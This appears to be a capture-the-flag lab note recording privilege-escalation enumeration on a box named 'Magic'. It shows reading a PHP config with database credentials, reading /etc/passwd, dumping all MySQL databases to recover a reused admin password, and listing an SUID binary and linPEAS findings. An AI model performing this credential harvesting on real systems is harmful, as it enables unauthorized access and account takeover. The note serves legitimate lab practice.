# 3 box enum www-data

```
www-data@ubuntu:/var/www/Magic$ cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

# mysql is not installed?
# tried su, didn't work

www-data@ubuntu:/tmp$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash

# mysqldump exists

www-data@ubuntu:/tmp$ mysqldump -u theseus -p --all-databases> dump.mysql

# from dump.mysql
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
# theseus:Th3s3usW4sK1ng works
```

## SuidEnum

```
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/bin/sysinfo
------------------------------

ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
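# owned by root:users with mode rwsr-x---, so www-data cannot execute it; we need to become theseus (a member of users) to use the SUID binary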
```

## PEAS

```
╣ Sudo version
Sudo version 1.8.21p2
# tried; not exploitable

╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
NAME                                       PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION
org.gnome.DisplayManager                  1082 gdm3            root             :1.18         gdm.service               -          -
 -- UID=0 EUID=0

╣ Active Ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -

╣ Users with console
root:x:0:0:root:/root:/bin/bash
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
```

